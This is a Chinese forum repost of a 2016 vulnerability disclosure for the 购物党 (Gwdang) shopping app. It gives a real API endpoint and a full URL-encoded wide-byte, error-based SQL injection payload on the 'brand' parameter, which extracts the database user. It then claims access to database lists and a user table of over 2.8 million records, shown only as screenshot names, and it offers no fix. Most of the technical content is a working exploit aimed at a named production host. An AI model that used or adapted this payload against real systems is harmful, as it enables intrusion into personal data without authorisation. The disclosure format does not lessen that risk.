HanDs
管理员

[7月漏洞公开] 购物党app一处宽字节报错注入(涉及280W+用户数据) 



详细说明:

目标:购物党IOS APP

检测发现以下地方存在SQL注入:(注入参数brand,报错注入)

code 区域
http://app.gwdang.com/app/price_baicai?brand=tcl&class_id=&format=json&img_width=180&keyword=&order_by=&pg=1&ps=20&site_id=



Payload:

code 区域
http://app.gwdang.com/app/price_baicai?brand=tcl%bf%27%2B%20AND%20%28SELECT%202518%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71787a6271%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x7171787171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29+--+-&class_id=&format=json&img_width=180&keyword=&order_by=&pg=1&ps=20&site_id=

漏洞证明:

1、当前数据库用户

user.jpg



2、所有数据库

dbs.jpg



3、用户表,涉及280W+用户数据

tb.jpg

修复方案:

请多指教~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
购物 a pp
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复